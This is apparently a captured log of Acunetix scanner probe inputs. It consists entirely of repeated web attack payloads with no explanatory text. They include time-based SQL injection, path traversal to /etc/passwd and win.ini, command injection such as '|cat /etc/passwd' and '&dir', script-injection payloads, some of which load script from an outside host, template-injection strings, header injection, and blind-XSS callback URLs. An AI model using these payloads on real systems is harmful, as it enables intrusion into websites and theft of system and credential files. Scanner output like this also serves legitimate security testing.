
1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1

${99841+99610}

1

1&lt

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n925716=v989939

1

1

\xf6<img acu onmouseover=prompt(978166) //\xf6>

'|'ld

)

1some_inexistent_file_with_long_name%00.jpg

1

-1)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

1

1<input autofocus onfocus=prompt(988635)>

1

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

'"()

/etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

QWh7yMUJ'

^(#$!@#$)(()))******

testasp.vulnweb.com

1

'

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

[url=http://www.acunetix.com]website security[/url]

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

xjgFjgu6')

1

1

1

"

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1_RXRH4 <ScRiPt >prompt(999120)</ScRiPt>

1

wSUCL5mP'))

1

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://hitPq1oE7nj63.bxss.me/

1

-1

1

1

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

&dir

1

-1)

1

comments

1

1

1

'&dir&'

1

file:///etc/passwd

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

-1))

1

comments/.

'"

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

s8iGT3Co'

1'"()&%<ScRiPt >prompt(973785)</ScRiPt>

1

1

1

<!--

1

upa5B2Pb')

'"()&%<ScRiPt >prompt(973015)</ScRiPt>

WEB-INF/web.xml

|dir

RQDb0m7b'))

1

1

1

1

1

1

WEB-INF\web.xml

1

'|dir

1_912125

1

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu10553\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10553

1

................windowswin.ini

1

1

acux10701\xc0\xbez1\xc0\xbcz2a\x90bcxuca10701

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(908862)</ScRiPt>

1

1<script>prompt(951253)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(960379)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?937015></ScRiPt>

1

1

1

1

response.write(9906739*9848978)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(963472)</ScRiPt>

1

1

'+response.write(9906739*9848978)+'

1

1<video><source onerror="javascript:prompt(961596)">

1

1

"+response.write(9906739*9848978)+"

1

&cat /etc/passwd&

1

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(953750)"></g></svg>

1

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<div style=width:expression(prompt(980395))>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1<iframe src='data:text/html

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

-1

1

${100107+100495}

1

1

1

1<body onload=prompt(972460)>

1

-1)

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n968290=v908965

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

-1))

)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(963035)>

1

1some_inexistent_file_with_long_name%00.jpg

1<img src=xyz OnErRor=prompt(994933)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

JeAfOGkl'

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

1<img/src=">" onerror=alert(979343)>

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

I8u4f3CB')

"|"ld

1

z8xAcjSq'))

testasp.vulnweb.com

1

1<ScRiPt%20>prompt(913739)</sCripT>

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1

1

1&lt

1

1

"

'

1

/etc/passwd

1

-1)

\xf6<img acu onmouseover=prompt(939821) //\xf6>

1

${@print(md5(acunetix_wvs_security_test))}

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1<input autofocus onfocus=prompt(917995)>

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

1

1

1

1

MPNdN3fa'

&dir

http://hitmqdGLX60Cb.bxss.me/

1

<a href='http://www.acunetix.com'>website security</a>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

1

mCzkQbye')

'&dir&'

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

OdwjKSv8'))

1

"&dir&"

1

http://www.acunetix.tst

1

comments

1

1

|dir

1

1

[url=http://www.acunetix.com]website security[/url]

comments/.

'"

file:///etc/passwd

1'"()&%<ScRiPt >prompt(973260)</ScRiPt>

1

1_QATXw <ScRiPt >prompt(950100)</ScRiPt>

'|dir

1

<!--

1

1

'"()&%<ScRiPt >prompt(946497)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

1

1

"|dir

1

1_925967

1

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

acu2105\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2105

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux2667\xc0\xbez1\xc0\xbcz2a\x90bcxuca2667

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(984631)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(969012)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(957493)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?920400></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(963248)</ScRiPt>

1

1

1

response.write(9444113*9056699)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(933374)">

1

&cat /etc/passwd&

'+response.write(9444113*9056699)+'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(963497)"></g></svg>

"+response.write(9444113*9056699)+"

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1<div style=width:expression(prompt(939499))>

1

"&cat /etc/passwd&"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

WEB-INF\web.xml

cat /etc/passwd

1

1<body onload=prompt(962838)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(995384)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

1

-1

1

${99289+100157}

1<img src=xyz OnErRor=prompt(987326)>

1

1&n922242=v938619

'|'ld

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img/src=">" onerror=alert(993548)>

"|"ld

1some_inexistent_file_with_long_name%00.jpg

)

1

-1))

1

'"()

1<ScRiPt%20>prompt(998215)</sCripT>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

1

D8vbhQ43'

1

'

1

'

1&lt

testasp.vulnweb.com

/etc/passwd

KAuzZHTS')

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

"

1

\xf6<img acu onmouseover=prompt(989492) //\xf6>

"

BPcVZy6p'))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(997073)>

1

-1

1

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

http://hitcfK8LiwSvK.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

<a href='http://www.acunetix.com'>website security</a>

-1)

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

&dir

comments

1

-1))

1

1

[url=http://www.acunetix.com]website security[/url]

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

HZnlL8Wn'

http://www.acunetix.tst

'&dir&'

comments

1

1

file:///etc/passwd

1_5mwyd <ScRiPt >prompt(908669)</ScRiPt>

1

0vbZrtXD')

"&dir&"

comments/.

'"

1

/\../\../\../\../\../\../\../etc/passwd

1

nHgBuFCi'))

1'"()&%<ScRiPt >prompt(971147)</ScRiPt>

1

1

1

|dir

<!--

1

1

WEB-INF/web.xml

1

1

'"()&%<ScRiPt >prompt(989582)</ScRiPt>

1

1

'|dir

1

1

1

WEB-INF\web.xml

1

1_943610

"|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1

acu10809\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10809

1

acux4007\xc0\xbez1\xc0\xbcz2a\x90bcxuca4007

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(939737)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(942613)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(935781)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?940584></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(965045)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(932265)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961097)"></g></svg>

1

response.write(9154309*9641286)

1

1

1

1<div style=width:expression(prompt(935965))>

'+response.write(9154309*9641286)+'

1<iframe src='data:text/html

WEB-INF/web.xml

&cat /etc/passwd&

1

1

"+response.write(9154309*9641286)+"

1<body onload=prompt(959852)>

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

'&cat /etc/passwd&'

1

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(998705)>

"&cat /etc/passwd&"

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(917813)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

1

1

1<img/src=">" onerror=alert(958785)>

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1

-1

1

1

1<ScRiPt%20>prompt(941512)</sCripT>

1

|cat /etc/passwd#

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${99670+99195}

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&lt

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n961635=v979779

'|'ld

1

1

-1)

1some_inexistent_file_with_long_name%00.jpg

\xf6<img acu onmouseover=prompt(912124) //\xf6>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

-1))

1

1

1<input autofocus onfocus=prompt(935865)>

1

testasp.vulnweb.com

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

M1Z7EodD'

<a href='http://www.acunetix.com'>website security</a>

1

1

/etc/passwd

^(#$!@#$)(()))******

1

'

umwXzK6x')

'"()

'

[url=http://www.acunetix.com]website security[/url]

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

jmszgE2q'))

"

1

1

"

1

1_WxStV <ScRiPt >prompt(987317)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

http://hitm86ZZpBcqT.bxss.me/

1

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1)

&dir

${@print(md5(acunetix_wvs_security_test))}\

'&dir&'

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1

-1))

http://www.acunetix.tst

comments

1

"&dir&"

1

1

1

3qhAVZoe'

1

file:///etc/passwd

1

comments

1

05rI2CXx')

'"

1'"()&%<ScRiPt >prompt(972933)</ScRiPt>

|dir

comments/.

/\../\../\../\../\../\../\../etc/passwd

He4Z2NL8'))

<!--

1

'"()&%<ScRiPt >prompt(953454)</ScRiPt>

1

'|dir

1

1

WEB-INF/web.xml

1

1_932982

1

1

1

1

"|dir

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

1

../../../../../../../../../../boot.ini

1

acu9389\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9389

1

../../../../../../../../../../windows/win.ini.jpg

1

acux3064\xc0\xbez1\xc0\xbcz2a\x90bcxuca3064

1

1<ScRiPt >prompt(954985)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(930462)</script>

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(933902)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983774></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(910699)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(972197)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(969264)"></g></svg>

1

response.write(9545558*9490635)

1<div style=width:expression(prompt(921807))>

&cat /etc/passwd&

1

1

1

'+response.write(9545558*9490635)+'

1<iframe src='data:text/html

1

'&cat /etc/passwd&'

1

1

1<body onload=prompt(991561)>

"+response.write(9545558*9490635)+"

1

1

WEB-INF/web.xml

"&cat /etc/passwd&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(947933)>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

WEB-INF\web.xml

1

1<img src=xyz OnErRor=prompt(957665)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(975509)>

1

1

`cat /etc/passwd`

1

${99243+99217}

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1<ScRiPt%20>prompt(989748)</sCripT>

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1

1

-1

1&n950438=v942351

1&lt

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

\xf6<img acu onmouseover=prompt(930774) //\xf6>

)

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

-1)

1

1

1

1<input autofocus onfocus=prompt(972275)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

"|"ld

1

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

'"()

1

LDQKKh9C'

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

1

1

'

[url=http://www.acunetix.com]website security[/url]

WiSppYzN')

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

"

1

1_t6dTs <ScRiPt >prompt(926194)</ScRiPt>

fX70qI34'))

1

1

1

/etc/passwd

http://hit3HcsssSjsi.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

1

1

"

-1

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

acunetix_wvs_invalid_filename

1

||cat /etc/passwd

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

&dir

http://www.acunetix.tst

comments

1

'"

1

DHfLKCC3'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1'"()&%<ScRiPt >prompt(902167)</ScRiPt>

comments/.

<!--

'&dir&'

1

1

1

'"()&%<ScRiPt >prompt(994001)</ScRiPt>

OBZlGTra')

1

1

"&dir&"

1

1

1_930142

vDl1jL5V'))

1

1

file:///etc/passwd

1

|dir

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

1

1

"|dir

acu4917\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4917

WEB-INF/web.xml

1

acux2999\xc0\xbez1\xc0\xbcz2a\x90bcxuca2999

1

WEB-INF\web.xml

1

1

1<ScRiPt >prompt(954376)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

1<script>prompt(955162)</script>

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(911062)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917276></ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(950009)</ScRiPt>

1

1

................windowswin.ini

1<video><source onerror="javascript:prompt(938974)">

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947883)"></g></svg>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<div style=width:expression(prompt(980111))>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9416090*9791983)

1

1

1<iframe src='data:text/html

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9416090*9791983)+'

1

1

1<body onload=prompt(941898)>

1

&cat /etc/passwd&

"+response.write(9416090*9791983)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(903639)>

'&cat /etc/passwd&'

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1<img src=xyz OnErRor=prompt(909760)>

WEB-INF\web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

if(now()=sysdate(),sleep(9.42),0)/*'XOR(if(now()=sysdate(),sleep(9.42),0))OR'"XOR(if(now()=sysdate(),sleep(9.42),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(906774)>

1

1

(select(0)from(select(sleep(9.42)))v)/*'+(select(0)from(select(sleep(9.42)))v)+'"+(select(0)from(select(sleep(9.42)))v)+"*/

1

${100203+100005}

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1<ScRiPt%20>prompt(979217)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1

1

|cat /etc/passwd#

1&n961804=v972189

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

1

1some_inexistent_file_with_long_name%00.jpg

-1)

)

\xf6<img acu onmouseover=prompt(950075) //\xf6>

1

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1))

!(()&&!|*|*|

1<input autofocus onfocus=prompt(962877)>

'"()

testasp.vulnweb.com

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

aZZ5n1UF'

^(#$!@#$)(()))******

1

'

1

1

1

82ONo6Q1')

[url=http://www.acunetix.com]website security[/url]

/etc/passwd

1

1

1

"

1

cdYQ8dmS'))

1_M4SX6 <ScRiPt >prompt(930224)</ScRiPt>

1

'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

-1

1

1

1

1

"

1

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitIKoZBB5jpm.bxss.me/

1

1

||cat /etc/passwd

1

1

-1))

1

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

acunetix_wvs_invalid_filename

http://www.acunetix.tst

lHrFuL8D'

1

'&dir&'

comments

'"

1

1

comments

1

"&dir&"

IB0pBz0n')

1

<!--

1'"()&%<ScRiPt >prompt(997355)</ScRiPt>

file:///etc/passwd

1

1

comments/.

|dir

1

6vxjpkyJ'))

1

'"()&%<ScRiPt >prompt(966976)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

'|dir

1_922021

1

WEB-INF/web.xml

1

1

1

"|dir

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu4583\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4583

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux4090\xc0\xbez1\xc0\xbcz2a\x90bcxuca4090

1

1

1

................windowswin.ini

1<ScRiPt >prompt(931339)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(964653)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(905317)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?984224></ScRiPt>

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(927289)</ScRiPt>

1

1

1

response.write(9432821*9602363)

1<video><source onerror="javascript:prompt(990508)">

&cat /etc/passwd&

1

WEB-INF/web.xml

1

1

'+response.write(9432821*9602363)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(980611)"></g></svg>

WEB-INF\web.xml

'&cat /etc/passwd&'

"+response.write(9432821*9602363)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

1

1

1<div style=width:expression(prompt(907450))>

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

cat /etc/passwd

1

if(now()=sysdate(),sleep(6.5),0)/*'XOR(if(now()=sysdate(),sleep(6.5),0))OR'"XOR(if(now()=sysdate(),sleep(6.5),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(977562)>

1

